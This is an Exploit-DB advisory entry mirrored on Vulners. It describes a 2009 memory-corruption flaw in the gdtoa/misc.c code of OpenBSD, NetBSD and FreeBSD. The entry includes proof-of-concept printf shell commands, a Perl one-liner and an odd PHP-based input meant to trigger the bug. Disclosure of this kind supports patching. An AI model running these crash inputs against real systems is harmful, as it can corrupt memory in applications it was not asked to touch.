Lucene search

K

BSD (Multiple Distributions) - 'gdtoa/misc.c' Memory Corruption

🗓️ 26 May 2009 00:00:00Reported by Maksymilian ArciemowiczType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 31 Views

BSD Multiple Distributions Memory Corruption Vulnerabilit

Show more
Code
source: https://www.securityfocus.com/bid/35510/info

Multiple BSD distributions are prone to a memory-corruption vulnerability because the software fails to properly bounds-check data used as an array index.

Attackers may exploit this issue to execute arbitrary code within the context of affected applications.

The following are vulnerable:

OpenBSD 4.5
NetBSD 5.0
FreeBSD 6.4 and 7.2

Other software based on the BSD code base may also be affected. 

The following proof-of-concept shell commands are available:

printf %1.262159f 1.1
printf %11.2109999999f
printf %11.2009999999f
printf %11.2009999999f

The following proof-of-concept Perl script is available:

#!/usr/local/bin/perl
printf "%0.4194310f", 0x0.0x41414141;

The following proof-of-concept J program is available:

cxib=0.<?php echo str_repeat("1",296450); ?> 

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
26 May 2009 00:00Current
7.4High risk
Vulners AI Score7.4
EPSS0.97
31
.json
Report